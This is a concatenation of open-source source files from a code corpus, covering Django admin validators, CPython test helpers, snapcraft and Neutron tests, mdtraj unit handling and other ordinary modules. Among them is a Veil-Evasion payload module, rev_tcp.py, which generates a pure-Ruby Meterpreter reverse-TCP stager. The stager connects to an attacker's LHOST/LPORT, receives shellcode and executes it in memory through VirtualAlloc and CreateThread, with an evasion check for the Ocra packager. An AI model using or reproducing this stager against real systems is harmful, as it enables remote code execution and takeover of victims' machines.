# If item is option 3, it should be a ListFilter...
if not issubclass(item, ListFilter):
raise ImproperlyConfigured("'%s.list_filter[%d]' is '%s'"
" which is not a descendant of ListFilter."
% (cls.__name__, idx, item.__name__))
# ... but not a FieldListFilter.
if issubclass(item, FieldListFilter):
raise ImproperlyConfigured("'%s.list_filter[%d]' is '%s'"
" which is of type FieldListFilter but is not"
" associated with a field name."
% (cls.__name__, idx, item.__name__))
else:
if isinstance(item, (tuple, list)):
# item is option #2
field, list_filter_class = item
if not issubclass(list_filter_class, FieldListFilter):
raise ImproperlyConfigured("'%s.list_filter[%d][1]'"
" is '%s' which is not of type FieldListFilter."
% (cls.__name__, idx, list_filter_class.__name__))
else:
# item is option #1
field = item
# Validate the field string
try:
get_fields_from_path(model, field)
except (NotRelationField, FieldDoesNotExist):
raise ImproperlyConfigured("'%s.list_filter[%d]' refers to '%s'"
" which does not refer to a Field."
% (cls.__name__, idx, field))
def validate_list_select_related(self, cls, model):
" Validate that list_select_related is a boolean, a list or a tuple. "
list_select_related = getattr(cls, 'list_select_related', None)
if list_select_related:
types = (bool, tuple, list)
if not isinstance(list_select_related, types):
raise ImproperlyConfigured("'%s.list_select_related' should be "
"either a bool, a tuple or a list" %
cls.__name__)
def validate_list_per_page(self, cls, model):
" Validate that list_per_page is an integer. "
check_type(cls, 'list_per_page', int)
def validate_list_max_show_all(self, cls, model):
" Validate that list_max_show_all is an integer. "
check_type(cls, 'list_max_show_all', int)
def validate_list_editable(self, cls, model):
"""
Validate that list_editable is a sequence of editable fields from
list_display without first element.
"""
if hasattr(cls, 'list_editable') and cls.list_editable:
check_isseq(cls, 'list_editable', cls.list_editable)
for idx, field_name in enumerate(cls.list_editable):
try:
field = model._meta.get_field_by_name(field_name)[0]
except models.FieldDoesNotExist:
raise ImproperlyConfigured("'%s.list_editable[%d]' refers to a "
"field, '%s', not defined on %s.%s."
% (cls.__name__, idx, field_name, model._meta.app_label, model.__name__))
if field_name not in cls.list_display:
raise ImproperlyConfigured("'%s.list_editable[%d]' refers to "
"'%s' which is not defined in 'list_display'."
% (cls.__name__, idx, field_name))
if cls.list_display_links is not None:
if field_name in cls.list_display_links:
raise ImproperlyConfigured("'%s' cannot be in both '%s.list_editable'"
" and '%s.list_display_links'"
% (field_name, cls.__name__, cls.__name__))
if not cls.list_display_links and cls.list_display[0] in cls.list_editable:
raise ImproperlyConfigured("'%s.list_editable[%d]' refers to"
" the first field in list_display, '%s', which can't be"
" used unless list_display_links is set."
% (cls.__name__, idx, cls.list_display[0]))
if not field.editable:
raise ImproperlyConfigured("'%s.list_editable[%d]' refers to a "
"field, '%s', which isn't editable through the admin."
% (cls.__name__, idx, field_name))
def validate_search_fields(self, cls, model):
" Validate search_fields is a sequence. "
if hasattr(cls, 'search_fields'):
check_isseq(cls, 'search_fields', cls.search_fields)
def validate_date_hierarchy(self, cls, model):
" Validate that date_hierarchy refers to DateField or DateTimeField. "
if cls.date_hierarchy:
f = get_field(cls, model, 'date_hierarchy', cls.date_hierarchy)
if not isinstance(f, (models.DateField, models.DateTimeField)):
raise ImproperlyConfigured("'%s.date_hierarchy is "
"neither an instance of DateField nor DateTimeField."
% cls.__name__)
class InlineValidator(BaseValidator):
def validate_fk_name(self, cls, model):
" Validate that fk_name refers to a ForeignKey. "
if cls.fk_name: # default value is None
f = get_field(cls, model, 'fk_name', cls.fk_name)
if not isinstance(f, models.ForeignKey):
raise ImproperlyConfigured("'%s.fk_name is not an instance of "
"models.ForeignKey." % cls.__name__)
def validate_extra(self, cls, model):
" Validate that extra is an integer. "
check_type(cls, 'extra', int)
def validate_max_num(self, cls, model):
" Validate that max_num is an integer. "
check_type(cls, 'max_num', int)
def validate_formset(self, cls, model):
" Validate formset is a subclass of BaseModelFormSet. "
if hasattr(cls, 'formset') and not issubclass(cls.formset, BaseModelFormSet):
raise ImproperlyConfigured("'%s.formset' does not inherit from "
"BaseModelFormSet." % cls.__name__)
def check_type(cls, attr, type_):
if getattr(cls, attr, None) is not None and not isinstance(getattr(cls, attr), type_):
raise ImproperlyConfigured("'%s.%s' should be a %s."
% (cls.__name__, attr, type_.__name__))
def check_isseq(cls, label, obj):
if not isinstance(obj, (list, tuple)):
raise ImproperlyConfigured("'%s.%s' must be a list or tuple." % (cls.__name__, label))
def check_isdict(cls, label, obj):
if not isinstance(obj, dict):
raise ImproperlyConfigured("'%s.%s' must be a dictionary." % (cls.__name__, label))
def get_field(cls, model, label, field):
try:
return model._meta.get_field(field)
except models.FieldDoesNotExist:
raise ImproperlyConfigured("'%s.%s' refers to field '%s' that is missing from model '%s.%s'."
% (cls.__name__, label, field, model._meta.app_label, model.__name__))
def fetch_attr(cls, model, label, field):
try:
return model._meta.get_field(field)
except models.FieldDoesNotExist:
pass
try:
return getattr(model, field)
except AttributeError:
raise ImproperlyConfigured("'%s.%s' refers to '%s' that is neither a field, method or property of model '%s.%s'."
% (cls.__name__, label, field, model._meta.app_label, model.__name__))
| bsd-3-clause |
damdam-s/account-invoicing | __unported__/account_invoice_customer_ref_unique/__openerp__.py | 30 | 1749 | # -*- encoding: utf-8 -*-
# #############################################################################
#
# OpenERP, Open Source Management Solution
# This module copyright (C) 2010 - 2014 Savoir-faire Linux
# (<http://www.savoirfairelinux.com>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
{
'name': 'Unique Customer Reference in Invoice',
"version": "1.0",
'author': "Savoir-faire Linux,Odoo Community Association (OCA)",
'maintainer': 'Savoir-faire Linux',
'website': 'http://www.savoirfairelinux.com',
'license': 'AGPL-3',
'category': 'Accounting & Finance',
'description': """
Unique Supplier Invoice Number
==============================
This module adds a insensitive constraint on the name Customer Reference
(name field): (partner_id, name) must be unique.
Contributors
------------
* Marc Cassuto ([email protected])
* Mathieu Benoit ([email protected])
""",
'depends': [
'account',
],
'installable': False,
}
| agpl-3.0 |
mancoast/CPythonPyc_test | cpython/270_script_helper.py | 3 | 4045 | # Common utility functions used by various script execution tests
# e.g. test_cmd_line, test_cmd_line_script and test_runpy
import sys
import os
import os.path
import tempfile
import subprocess
import py_compile
import contextlib
import shutil
import zipfile
# Executing the interpreter in a subprocess
def python_exit_code(*args):
cmd_line = [sys.executable, '-E']
cmd_line.extend(args)
with open(os.devnull, 'w') as devnull:
return subprocess.call(cmd_line, stdout=devnull,
stderr=subprocess.STDOUT)
def spawn_python(*args, **kwargs):
cmd_line = [sys.executable, '-E']
cmd_line.extend(args)
return subprocess.Popen(cmd_line, stdin=subprocess.PIPE,
stdout=subprocess.PIPE, stderr=subprocess.STDOUT,
**kwargs)
def kill_python(p):
p.stdin.close()
data = p.stdout.read()
p.stdout.close()
# try to cleanup the child so we don't appear to leak when running
# with regrtest -R.
p.wait()
subprocess._cleanup()
return data
def run_python(*args, **kwargs):
if __debug__:
p = spawn_python(*args, **kwargs)
else:
p = spawn_python('-O', *args, **kwargs)
stdout_data = kill_python(p)
return p.wait(), stdout_data
# Script creation utilities
@contextlib.contextmanager
def temp_dir():
dirname = tempfile.mkdtemp()
dirname = os.path.realpath(dirname)
try:
yield dirname
finally:
shutil.rmtree(dirname)
def make_script(script_dir, script_basename, source):
script_filename = script_basename+os.extsep+'py'
script_name = os.path.join(script_dir, script_filename)
script_file = open(script_name, 'w')
script_file.write(source)
script_file.close()
return script_name
def compile_script(script_name):
py_compile.compile(script_name, doraise=True)
if __debug__:
compiled_name = script_name + 'c'
else:
compiled_name = script_name + 'o'
return compiled_name
def make_zip_script(zip_dir, zip_basename, script_name, name_in_zip=None):
zip_filename = zip_basename+os.extsep+'zip'
zip_name = os.path.join(zip_dir, zip_filename)
zip_file = zipfile.ZipFile(zip_name, 'w')
if name_in_zip is None:
name_in_zip = os.path.basename(script_name)
zip_file.write(script_name, name_in_zip)
zip_file.close()
#if test.test_support.verbose:
# zip_file = zipfile.ZipFile(zip_name, 'r')
# print 'Contents of %r:' % zip_name
# zip_file.printdir()
# zip_file.close()
return zip_name, os.path.join(zip_name, name_in_zip)
def make_pkg(pkg_dir):
os.mkdir(pkg_dir)
make_script(pkg_dir, '__init__', '')
def make_zip_pkg(zip_dir, zip_basename, pkg_name, script_basename,
source, depth=1, compiled=False):
unlink = []
init_name = make_script(zip_dir, '__init__', '')
unlink.append(init_name)
init_basename = os.path.basename(init_name)
script_name = make_script(zip_dir, script_basename, source)
unlink.append(script_name)
if compiled:
init_name = compile_script(init_name)
script_name = compile_script(script_name)
unlink.extend((init_name, script_name))
pkg_names = [os.sep.join([pkg_name]*i) for i in range(1, depth+1)]
script_name_in_zip = os.path.join(pkg_names[-1], os.path.basename(script_name))
zip_filename = zip_basename+os.extsep+'zip'
zip_name = os.path.join(zip_dir, zip_filename)
zip_file = zipfile.ZipFile(zip_name, 'w')
for name in pkg_names:
init_name_in_zip = os.path.join(name, init_basename)
zip_file.write(init_name, init_name_in_zip)
zip_file.write(script_name, script_name_in_zip)
zip_file.close()
for name in unlink:
os.unlink(name)
#if test.test_support.verbose:
# zip_file = zipfile.ZipFile(zip_name, 'r')
# print 'Contents of %r:' % zip_name
# zip_file.printdir()
# zip_file.close()
return zip_name, os.path.join(zip_name, script_name_in_zip)
| gpl-3.0 |
jorik041/Veil-Evasion | modules/payloads/ruby/meterpreter/rev_tcp.py | 4 | 2456 | """
Custom-written pure ruby meterpreter/reverse_tcp stager.
TODO: better randomization
Module built by @harmj0y
"""
from modules.common import shellcode
from modules.common import helpers
class Payload:
def __init__(self):
# required options
self.description = "pure windows/meterpreter/reverse_tcp stager, no shellcode"
self.language = "ruby"
self.extension = "rb"
self.rating = "Normal"
# options we require user ineraction for- format is {Option : [Value, Description]]}
self.required_options = { "compile_to_exe" : ["Y", "Compile to an executable"],
"LHOST" : ["", "IP of the metasploit handler"],
"LPORT" : ["", "Port of the metasploit handler"]}
def generate(self):
payloadCode = "require 'rubygems';require 'win32/api';require 'socket';include Win32\n"
payloadCode += "exit if Object.const_defined?(:Ocra)\n"
payloadCode += "$v = API.new('VirtualAlloc', 'IIII', 'I');$r = API.new('RtlMoveMemory', 'IPI', 'V');$c = API.new('CreateThread', 'IIIIIP', 'I');$w = API.new('WaitForSingleObject', 'II', 'I')\n"
payloadCode += "$g_o = API.new('_get_osfhandle', 'I', 'I', 'msvcrt.dll')\n"
payloadCode += "def g(ip,port)\n"
payloadCode += "\tbegin\n"
payloadCode += "\t\ts = TCPSocket.open(ip, port)\n"
payloadCode += "\t\tpl = Integer(s.recv(4).unpack('L')[0])\n"
payloadCode += "\t\tp = \" \"\n"
payloadCode += "\t\twhile p.length < pl\n\t\tp += s.recv(pl) end\n"
payloadCode += "\t\tp[0] = ['BF'].pack(\"H*\")\n"
payloadCode += "\t\tsd = $g_o.call(s.fileno)\n"
payloadCode += "\t\tfor i in 1..4\n\t\t\tp[i] = Array(sd).pack('V')[i-1] end\n"
payloadCode += "\t\treturn p\n"
payloadCode += "\trescue\n\treturn \"\"\n\tend\nend\n"
payloadCode += "def ij(sc)\n"
payloadCode += "\tif sc.length > 1000\n"
payloadCode += "\t\tpt = $v.call(0,(sc.length > 0x1000 ? sc.length : 0x1000), 0x1000, 0x40)\n"
payloadCode += "\t\tx = $r.call(pt,sc,sc.length)\n"
payloadCode += "\t\tx = $w.call($c.call(0,0,pt,0,0,0),0xFFFFFFF)\n"
payloadCode += "\tend\nend\n"
payloadCode += "ij(g(\"%s\",%s))" % (self.required_options["LHOST"][0], self.required_options["LPORT"][0])
return payloadCode
| gpl-3.0 |
ThomasMcVay/MediaApp | MediaAppKnobs/IntKnob.py | 1 | 1958 | #===============================================================================
# @Author: Madison Aster
# @ModuleDescription:
# @License:
# MediaApp Library - Python Package framework for developing robust Media
# Applications with Qt Library
# Copyright (C) 2013 Madison Aster
#
# This library is free software; you can redistribute it and/or
# modify it under the terms of the GNU Lesser General Public
# License version 2.1 as published by the Free Software Foundation;
#
# This library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this library; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA
#
# See LICENSE in the root directory of this library for copy of
# GNU Lesser General Public License and other license details.
#===============================================================================
from Qt import QtGui, QtCore, QtWidgets
from .KnobConstructor import Knob
from . import KnobElements
class IntKnob(Knob):
def __init__(self, value, name = 'IntKnob'):
super(IntKnob, self).__init__()
self.setSizePolicy(QtWidgets.QSizePolicy.Maximum, QtWidgets.QSizePolicy.Fixed)
self.IntWidget = KnobElements.IntWidget()
self.knobLayout.addWidget(self.IntWidget)
#self.knobLayout.addWidget(KnobElements.Spacer())
self.name.setText(name)
self.setValue(value)
def setValue(self, value):
self.IntWidget.setValue(value)
def getValue(self):
return self.IntWidget.getValue()
| lgpl-2.1 |
josepht/snapcraft | snapcraft/tests/states/test_pull.py | 7 | 3875 | # -*- Mode:Python; indent-tabs-mode:nil; tab-width:4 -*-
#
# Copyright (C) 2016 Canonical Ltd
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License version 3 as
# published by the Free Software Foundation.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
import yaml
import snapcraft.internal
from snapcraft import tests
class PullStateBaseTestCase(tests.TestCase):
def setUp(self):
super().setUp()
class Project:
def __init__(self):
self.deb_arch = 'amd64'
self.project = Project()
self.property_names = ['foo']
self.part_properties = {'foo': 'bar'}
self.state = snapcraft.internal.states.PullState(
self.property_names, self.part_properties, self.project)
class PullStateTestCase(PullStateBaseTestCase):
def test_yaml_conversion(self):
state_from_yaml = yaml.load(yaml.dump(self.state))
self.assertEqual(self.state, state_from_yaml)
def test_comparison(self):
other = snapcraft.internal.states.PullState(
self.property_names, self.part_properties, self.project)
self.assertTrue(self.state == other, 'Expected states to be identical')
def test_properties_of_interest(self):
self.part_properties.update({
'plugin': 'test-plugin',
'stage-packages': ['test-stage-package'],
'source': 'test-source',
'source-commit': 'test-source-commit',
'source-depth': 'test-source-depth',
'source-tag': 'test-source-tag',
'source-type': 'test-source-type',
'source-branch': 'test-source-branch',
'source-subdir': 'test-source-subdir',
})
properties = self.state.properties_of_interest(self.part_properties)
self.assertEqual(10, len(properties))
self.assertEqual('bar', properties['foo'])
self.assertEqual('test-plugin', properties['plugin'])
self.assertEqual(['test-stage-package'], properties['stage-packages'])
self.assertEqual('test-source', properties['source'])
self.assertEqual('test-source-commit', properties['source-commit'])
self.assertEqual('test-source-depth', properties['source-depth'])
self.assertEqual('test-source-tag', properties['source-tag'])
self.assertEqual('test-source-type', properties['source-type'])
self.assertEqual('test-source-branch', properties['source-branch'])
self.assertEqual('test-source-subdir', properties['source-subdir'])
def test_project_options_of_interest(self):
options = self.state.project_options_of_interest(self.project)
self.assertEqual(1, len(options))
self.assertEqual('amd64', options['deb_arch'])
class PullStateNotEqualTestCase(PullStateBaseTestCase):
scenarios = [
('no property names', dict(
other_property='property_names', other_value=[])),
('no part properties', dict(
other_property='part_properties', other_value=None)),
('no project', dict(
other_property='project', other_value=None)),
]
def test_comparison_not_equal(self):
setattr(self, self.other_property, self.other_value)
other_state = snapcraft.internal.states.PullState(
self.property_names, self.part_properties, self.project)
self.assertFalse(self.state == other_state,
'Expected states to be different')
| gpl-3.0 |
ownport/ansiblite | src/jinja2/constants.py | 220 | 1626 | # -*- coding: utf-8 -*-
"""
jinja.constants
~~~~~~~~~~~~~~~
Various constants.
:copyright: (c) 2017 by the Jinja Team.
:license: BSD, see LICENSE for more details.
"""
#: list of lorem ipsum words used by the lipsum() helper function
LOREM_IPSUM_WORDS = u'''\
a ac accumsan ad adipiscing aenean aliquam aliquet amet ante aptent arcu at
auctor augue bibendum blandit class commodo condimentum congue consectetuer
consequat conubia convallis cras cubilia cum curabitur curae cursus dapibus
diam dictum dictumst dignissim dis dolor donec dui duis egestas eget eleifend
elementum elit enim erat eros est et etiam eu euismod facilisi facilisis fames
faucibus felis fermentum feugiat fringilla fusce gravida habitant habitasse hac
hendrerit hymenaeos iaculis id imperdiet in inceptos integer interdum ipsum
justo lacinia lacus laoreet lectus leo libero ligula litora lobortis lorem
luctus maecenas magna magnis malesuada massa mattis mauris metus mi molestie
mollis montes morbi mus nam nascetur natoque nec neque netus nibh nisi nisl non
nonummy nostra nulla nullam nunc odio orci ornare parturient pede pellentesque
penatibus per pharetra phasellus placerat platea porta porttitor posuere
potenti praesent pretium primis proin pulvinar purus quam quis quisque rhoncus
ridiculus risus rutrum sagittis sapien scelerisque sed sem semper senectus sit
sociis sociosqu sodales sollicitudin suscipit suspendisse taciti tellus tempor
tempus tincidunt torquent tortor tristique turpis ullamcorper ultrices
ultricies urna ut varius vehicula vel velit venenatis vestibulum vitae vivamus
viverra volutpat vulputate'''
| gpl-3.0 |
2014c2g12/c2g12 | wsgi/w2/static/Brython2.0.0-20140209-164925/Lib/ui/slider.py | 111 | 2275 | import widget
from browser import doc,html
class Slider(widget.Widget):
def __init__(self, id=None, label=False):
self._div_shell=html.DIV(Class="ui-slider ui-slider-horizontal ui-widget ui-widget-content ui-corner-all")
widget.Widget.__init__(self, self._div_shell, 'slider', id)
self._handle=html.A(Class="ui-slider-handle ui-state-default ui-corner-all",
Href='#', style={'left': '0px'})
self._value=0
self._isMouseDown=False
def startSlide(e):
self._isMouseDown=True
self._upperBound = self._div_shell.offsetWidth - self._handle.offsetWidth
pos = widget.getMousePosition(e)
self._startMouseX=pos['x']
self._lastElementLeft = parseInt(self._handle.style.left)
updatePosition(e)
def updatePosition(e):
pos = widget.getMousePosition(e)
#print('mose pos',pos)
_newPos = self._lastElementLeft + pos['x'] - self._startMouseX
_newPos = max(0, _newPos)
_newPos = min(_newPos, self._upperBound)
self._handle.style.left = '%spx' % _newPos
#print('new position',self._handle.style.left)
self._lastElementLeft = _newPos
def moving(e):
if self._isMouseDown:
updatePosition(e)
def dropCallback(e):
self._isMouseDown=False
self._handle.unbind('mousemove', moving)
self._handle.bind('mousemove', moving)
self._handle.bind('mouseup', dropCallback)
#self._handle.bind('mouseout', dropCallback)
self._handle.bind('mousedown', startSlide)
def mouseover(e):
_class=self._handle.getAttribute('class')
self._handle.setAttribute('class', '%s %s' % (_class, 'ui-state-hover'))
def mouseout(e):
self._isMouseDown=False
_class=self._handle.getAttribute('class')
self._handle.setAttribute('class', _class.replace('ui-state-hover', ''))
self._handle.bind('mouseover', mouseover)
self._handle.bind('mouseout', mouseout)
self._div_shell <= self._handle
def get_value(self):
return self._value
#def set_value(self, value):
# self._value=value
# self._handle.style.left='%spx' % value
| gpl-2.0 |
leeping/mdtraj | mdtraj/utils/unit/__init__.py | 12 | 6902 | ##############################################################################
# MDTraj: A Python Library for Loading, Saving, and Manipulating
# Molecular Dynamics Trajectories.
# Copyright 2012-2013 Stanford University and the Authors
#
# Authors: Robert McGibbon
# Contributors:
#
# MDTraj is free software: you can redistribute it and/or modify
# it under the terms of the GNU Lesser General Public License as
# published by the Free Software Foundation, either version 2.1
# of the License, or (at your option) any later version.
#
# This library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with MDTraj. If not, see <http://www.gnu.org/licenses/>.
##############################################################################
"""
Unit processing for MDTraj. This subpackage is a port of simtk.unit from
OpenMM. Unlike in simtk.openmm, the MDTraj library **does not pass around
"united quantities"**
The only publicly facing API from this package, for the purpose of MDTraj,
is "in_units_of", which does unit conversion of numbers or numpy arrays
where the input and output units are passed as strings.
"""
import ast
import sys
import numpy as np
from mdtraj.utils.unit.quantity import Quantity
from mdtraj.utils.unit import unit_definitions
from mdtraj.utils import import_, six
UNIT_DEFINITIONS = unit_definitions
try:
import simtk.unit as simtk_unit
except ImportError:
pass
__all__ = ['in_units_of']
class _UnitContext(ast.NodeTransformer):
"""Node transformer for an AST hack that turns raw strings into
complex simt.unit.Unit expressions. See _str_to_unit for how this
is used -- it's not really meant to stand on its own
"""
# we want to do some validation to ensure that the AST only
# contains "safe" operations. These are operations that can reasonably
# appear in unit expressions
allowed_ops = [ast.Expression, ast.BinOp, ast.Name, ast.Attribute,
ast.Pow, ast.Div, ast.Mult, ast.Num]
def visit(self, node):
if not any(isinstance(node, a) for a in self.allowed_ops):
raise ValueError('Invalid unit expression. Contains dissallowed '
'operation %s' % node.__class__.__name__)
return super(_UnitContext, self).visit(node)
def visit_Name(self, node):
# we want to prefix all names to look like unit.nanometers instead
# of just "nanometers", because I don't want to import * from
# units into this module
if not hasattr(unit_definitions, node.id):
# also, let's take this opporunity to check that the node.id
# (which supposed to be the name of the unit, like "nanometers")
# is actually an attribute in simtk.unit
raise ValueError('%s is not a valid unit' % node.id)
return ast.Attribute(value=ast.Name(id='unit_definitions', ctx=ast.Load()),
attr=node.id, ctx=ast.Load())
_unit_context = _UnitContext() # global instance of the visitor
def _str_to_unit(unit_string, simtk=False):
"""eval() based transformer that extracts a simtk.unit object
from a string description.
Parameters
----------
unit_string : str
string description of a unit. this may contain expressions with
multiplication, division, powers, etc.
Examples
--------
>>> type(_str_to_unit('nanometers**2/meters*gigajoules'))
<class 'simtk.unit.unit.Unit'>
>>> str(_str_to_unit('nanometers**2/meters*gigajoules'))
'nanometer**2*gigajoule/meter'
"""
# parse the string with the ast, and then run out unit context
# visitor on it, which will basically change bare names like
# "nanometers" into "unit.nanometers" and simulataniously check that
# there's no nefarious stuff in the expression.
assert isinstance(unit_string, six.string_types)
unit_definitions = UNIT_DEFINITIONS
if simtk:
unit_definitions = import_('simtk.unit').unit_definitions
parsed = ast.parse(unit_string, mode='eval')
node = _unit_context.visit(parsed)
fixed_node = ast.fix_missing_locations(node)
output = eval(compile(fixed_node, '<string>', mode='eval'), {}, locals())
return output
def in_units_of(quantity, units_in, units_out, inplace=False):
"""Convert a numerical quantity between unit systems.
Parameters
----------
quantity : {number, np.ndarray, simtk.unit.Quantity}
quantity can either be a unitted quantity -- i.e. instance of
simtk.unit.Quantity, or just a bare number or numpy array
units_in : str
If you supply a quantity that's not a simtk.unit.Quantity, you should
tell me what units it is in. If you don't, i'm just going to echo you
back your quantity without doing any unit checking.
units_out : str
A string description of the units you want out. This should look
like "nanometers/picosecond" or "nanometers**3" or whatever
inplace : bool
Attempt to do the transformation inplace, by mutating the `quantity`
argument and avoiding a copy. This is only possible if `quantity` is a
writable numpy array.
Returns
-------
rquantity : {number, np.ndarray}
The resulting quantity, in the new unit system. If the function was
called with `inplace=True` and `quantity` was a writable numpy array,
`rquantity` will alias the same memory as the input `quantity`, which
will have been changed inplace. Otherwise, if a copy was required,
`rquantity` will point to new memory.
Examples
--------
>>> in_units_of(1, 'meter**2/second', 'nanometers**2/picosecond')
1000000.0
"""
if quantity is None:
return quantity
if 'simtk.unit' in sys.modules and isinstance(quantity, simtk_unit.Quantity):
units_in = quantity.unit
units_out = _str_to_unit(units_out, simtk=True)
quantity = quantity._value
elif isinstance(quantity, Quantity):
units_in = quantity.unit
units_out = _str_to_unit(units_out)
quantity = quantity._value
else:
if units_in is None:
return quantity
units_in = _str_to_unit(units_in)
units_out = _str_to_unit(units_out)
if not units_in.is_compatible(units_out):
raise TypeError('Unit "%s" is not compatible with Unit "%s".' % (units_in, units_out))
factor = units_in.conversion_factor_to(units_out)
if inplace and (isinstance(quantity, np.ndarray) and quantity.flags['WRITEABLE']):
quantity *= factor
return quantity
return quantity * factor
| lgpl-2.1 |
virtualopensystems/neutron | neutron/tests/unit/nec/test_agent_scheduler.py | 5 | 4501 | # Copyright 2013 NEC Corporation. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import contextlib
from neutron.common import constants
from neutron.db import l3_rpc_base
from neutron.tests.unit.nec import test_nec_plugin
from neutron.tests.unit.openvswitch import test_agent_scheduler
L3_HOSTA = test_agent_scheduler.L3_HOSTA
L3_HOSTB = test_agent_scheduler.L3_HOSTB
class NecAgentSchedulerTestCase(
test_agent_scheduler.OvsAgentSchedulerTestCase,
test_nec_plugin.NecPluginV2TestCaseBase):
plugin_str = test_nec_plugin.PLUGIN_NAME
l3_plugin = None
def setUp(self):
self.setup_nec_plugin_base()
super(NecAgentSchedulerTestCase, self).setUp()
class NecDhcpAgentNotifierTestCase(
test_agent_scheduler.OvsDhcpAgentNotifierTestCase,
test_nec_plugin.NecPluginV2TestCaseBase):
plugin_str = test_nec_plugin.PLUGIN_NAME
def setUp(self):
self.setup_nec_plugin_base()
super(NecDhcpAgentNotifierTestCase, self).setUp()
class NecL3AgentNotifierTestCase(
test_agent_scheduler.OvsL3AgentNotifierTestCase,
test_nec_plugin.NecPluginV2TestCaseBase):
plugin_str = test_nec_plugin.PLUGIN_NAME
l3_plugin = None
def setUp(self):
self.setup_nec_plugin_base()
super(NecL3AgentNotifierTestCase, self).setUp()
class NecL3AgentSchedulerWithOpenFlowRouter(
test_agent_scheduler.OvsAgentSchedulerTestCaseBase,
test_nec_plugin.NecPluginV2TestCaseBase):
plugin_str = test_nec_plugin.PLUGIN_NAME
def setUp(self):
self.setup_nec_plugin_base()
super(NecL3AgentSchedulerWithOpenFlowRouter, self).setUp()
def test_router_auto_schedule_with_l3agent_and_openflow(self):
with contextlib.nested(
self.router(),
self.router(arg_list=('provider',),
provider='openflow'
)) as (r1, r2):
l3_rpc = l3_rpc_base.L3RpcCallbackMixin()
self._register_agent_states()
ret_a = l3_rpc.sync_routers(self.adminContext, host=L3_HOSTA)
ret_b = l3_rpc.sync_routers(self.adminContext, host=L3_HOSTB)
l3_agents = self._list_l3_agents_hosting_router(
r1['router']['id'])
self.assertEqual(1, len(ret_a))
self.assertFalse(len(ret_b))
self.assertIn(r1['router']['id'], [r['id'] for r in ret_a])
self.assertNotIn(r2['router']['id'], [r['id'] for r in ret_a])
self.assertEqual(1, len(l3_agents['agents']))
self.assertEqual(L3_HOSTA, l3_agents['agents'][0]['host'])
def test_router_auto_schedule_only_with_openflow_router(self):
with contextlib.nested(
self.router(arg_list=('provider',), provider='openflow'),
self.router(arg_list=('provider',), provider='openflow')
) as (r1, r2):
l3_rpc = l3_rpc_base.L3RpcCallbackMixin()
self._register_agent_states()
ret_a = l3_rpc.sync_routers(self.adminContext, host=L3_HOSTA)
l3_agents_1 = self._list_l3_agents_hosting_router(
r1['router']['id'])
l3_agents_2 = self._list_l3_agents_hosting_router(
r2['router']['id'])
self.assertFalse(len(ret_a))
self.assertNotIn(r1['router']['id'], [r['id'] for r in ret_a])
self.assertNotIn(r2['router']['id'], [r['id'] for r in ret_a])
self.assertFalse(len(l3_agents_1['agents']))
self.assertFalse(len(l3_agents_2['agents']))
def test_add_router_to_l3_agent_for_openflow_router(self):
with self.router(arg_list=('provider',), provider='openflow') as r1:
self._register_agent_states()
hosta_id = self._get_agent_id(constants.AGENT_TYPE_L3,
L3_HOSTA)
self._add_router_to_l3_agent(hosta_id,
r1['router']['id'],
expected_code=409)
| apache-2.0 |
Suninus/portia | slyd/tests/test_repoman.py | 14 | 9855 | import unittest
from tempfile import mkdtemp
from os.path import join
from shutil import rmtree
from json import dumps, loads
import copy
from .settings import SPEC_DATA_DIR
from slyd.gitstorage.repoman import Repoman
def j(json):
return dumps(json, sort_keys=True, indent=4)
class RepomanTest(unittest.TestCase):
def setUp(self):
self.temp_repos_dir = mkdtemp(dir=SPEC_DATA_DIR,
prefix='test-run-')
Repoman.setup(
storage_backend='dulwich.fsrepo.FsRepo',
location=self.temp_repos_dir
)
def tearDown(self):
rmtree(self.temp_repos_dir)
def get_full_name(self, repo_name):
return join(self.temp_repos_dir, repo_name)
def test_create(self):
Repoman.create_repo(self.get_full_name('my_repo'))
self.assertTrue(Repoman.repo_exists(self.get_full_name('my_repo')))
def test_save_file(self):
repoman = Repoman.create_repo(self.get_full_name('my_repo'))
contents = j({'a': 1})
repoman.save_file('f1', contents, 'testbranch')
self.assertEqual(['f1'], repoman.list_files_for_branch('testbranch'))
self.assertEqual(
contents, repoman.file_contents_for_branch('f1', 'testbranch'))
def test_delete_file(self):
repoman = Repoman.create_repo(self.get_full_name('my_repo'))
contents = j({'a': 1})
repoman.save_file('f1', contents, 'testbranch')
repoman.delete_file('f1', 'testbranch')
self.assertEqual([], repoman.list_files_for_branch('testbranch'))
def test_branch_ops(self):
repoman = Repoman.create_repo(self.get_full_name('my_repo'))
repoman.create_branch('b1')
self.assertTrue(repoman.has_branch('b1'))
self.assertEqual(len(repoman.get_branch('b1')), 40)
repoman.delete_branch('b1')
self.assertFalse(repoman.has_branch('b1'))
def test_simple_publish(self):
repoman = Repoman.create_repo(self.get_full_name('my_repo'))
